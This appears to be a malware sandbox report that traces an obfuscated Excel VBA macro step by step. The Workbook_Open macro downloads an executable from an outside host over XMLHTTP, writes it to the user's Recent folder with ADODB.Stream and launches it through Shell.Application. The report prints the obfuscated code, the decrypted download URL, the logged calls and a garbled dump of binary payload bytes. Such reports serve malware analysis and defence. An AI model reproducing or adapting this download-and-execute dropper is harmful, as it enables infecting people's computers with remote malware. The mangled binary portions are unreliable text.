?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???I???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????+?????)

                                              SaveToFile

                                              Close

                                              Open

                                              		IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe")
                                              StringsDecrypted Strings
                                              "200"
                                              "WScript.Shell"
                                              "Recent"
                                              "microsoft.xmlhttp"
                                              "Shell.Application"
                                              "get"
                                              "h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5dj\xc3g\xd5\xc5zlk\xc3\xd2k\xc5zk\xc3\xc5g\xc0\xd5\xd2\xc2\xc0\xc5\xd3\xd5\xe2Nbg\xd5\xd4gg\xd6\xc2h\xdc/d\xdchd\xc3\xdcjd\xd5\xc3\xd6j\xd5\xc2\xd6\xc0w\xd6w\xc2w\xc0\xdc\xd4\xdcgh\xd5d\xd6\xdc\xd5\xd4\xdc\xc0\xd6w\xc2w\xd6\xd4\xd6\xc0/\xc0g\xc0\xd5d\xd4h\xd5\xd6jh\xdc\xc3jgh\xd5\xd4g\xc0\xd4\xc2g\xc0\xc3j\xdchd\xc3h\xd5\xd6\xd5h/\xdcd\xc3\xc1\xd6\xdc\xdb\xd4g\xd6\xd5\xc2\xd4\xd6\xd4\xd5\xc2z/\xc0\xd5\xdbh\xc3zdhhz.\xc2\xdb\xc2"
                                              "adodb.stream"
                                              "adodb.stream"
                                              LineInstructionMeta Information
                                              34

                                              Sub Workbook_Open()

                                              35

                                              Dim WshShell as Object

                                              executed
                                              36

                                              Dim GetUserDesktop as String

                                              37

                                              Dim \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0 as Integer

                                              38

                                              \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0 = Chr(50) + Chr(48) + Chr(48)

                                              Chr

                                              41

                                              Set WshShell = CreateObject("WScript.Shell")

                                              CreateObject("WScript.Shell")

                                              executed
                                              42

                                              GetUserDesktop = WshShell.SpecialFolders("Recent")

                                              SpecialFolders

                                              43

                                              Dim \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa

                                              44

                                              Dim \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5

                                              45

                                              Dim \xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac

                                              46

                                              Dim \xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8

                                              47

                                              Dim \xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf

                                              48

                                              Dim \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb as Integer

                                              49

                                              Dim \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8

                                              50

                                              Dim \xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc

                                              51

                                              \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb = 1

                                              56

                                              Set \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8 = CreateObject("microsoft.xmlhttp")

                                              CreateObject("microsoft.xmlhttp")

                                              executed
                                              57

                                              Set \xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf = CreateObject("Shell.Application")

                                              CreateObject("Shell.Application")

                                              executed
                                              59

                                              \xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8 = GetUserDesktop + \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd("\V\xb6ZVQX\xe2\xdaT.\xc2\xdb\xc2")

                                              60

                                              \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.Open "get", \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd("h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5dj\xc3g\xd5\xc5zlk\xc3\xd2k\xc5zk\xc3\xc5g\xc0\xd5\xd2\xc2\xc0\xc5\xd3\xd5\xe2Nbg\xd5\xd4gg\xd6\xc2h\xdc/d\xdchd\xc3\xdcjd\xd5\xc3\xd6j\xd5\xc2\xd6\xc0w\xd6w\xc2w\xc0\xdc\xd4\xdcgh\xd5d\xd6\xdc\xd5\xd4\xdc\xc0\xd6w\xc2w\xd6\xd4\xd6\xc0/\xc0g\xc0\xd5d\xd4h\xd5\xd6jh\xdc\xc3jgh\xd5\xd4g\xc0\xd4\xc2g\xc0\xc3j\xdchd\xc3h\xd5\xd6\xd5h/\xdcd\xc3\xc1\xd6\xdc\xdb\xd4g\xd6\xd5\xc2\xd4\xd6\xd4\xd5\xc2z/\xc0\xd5\xdbh\xc3zdhhz.\xc2\xdb\xc2"), False

                                              IXMLHTTPRequest.Open("get","https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe",False)

                                              executed
                                              61

                                              \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.send

                                              send

                                              62

                                              \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5 = \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.responseBody

                                              responseBody

                                              63

                                              If \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.Status = 200 Then

                                              IXMLHTTPRequest.Status() -> 200

                                              executed
                                              64

                                              Set \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa = CreateObject("adodb.stream")

                                              CreateObject("adodb.stream")

                                              executed
                                              65

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Open

                                              Stream.Open()

                                              executed
                                              66

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Type = \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb

                                              Type

                                              67

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Write \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5

                                              Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x04?\x00\x00\x00?\x04 \x00?\x04\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x04?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x04O\x00?\x04?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x04\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x04 \x00?\x04?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x04?\x00?\x04\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x04?\x00?\x04\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x04\x00\x00H\x00\x02\x05?\x04?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00????????????????\x1e???????????????????????????????????????????????????????????????????????????????????????????+???????????????\xfffd\x17??????????????????????????????????????????????????????????????????????????-??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????i?????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????\xfffd??????????????????????????????????????????????????????R????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????S?????????????I??????????????????????????????????????????????????u<???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????????????????????H????????????????????????+?????????????????????a??????+????????????L????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????E????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U???????????????????<??????????????????????????????????????????????????????????????????????????????S??????????????????????????????????????????????r????????????I????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????&??????????????????????????????????????????/????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\????????????????????????????????t???????.??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????^???????????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????s???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????e?????????????????????????????????????????????????????????????????????????????????????i?????????????????????????????????????????????J????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????H???????????????????????????????????????????????????????[?????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???I???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????+?????)

                                              executed
                                              68

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.SaveToFile \xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8, \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb + \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb

                                              SaveToFile

                                              69

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Close

                                              Close

                                              70

                                              Endif

                                              71

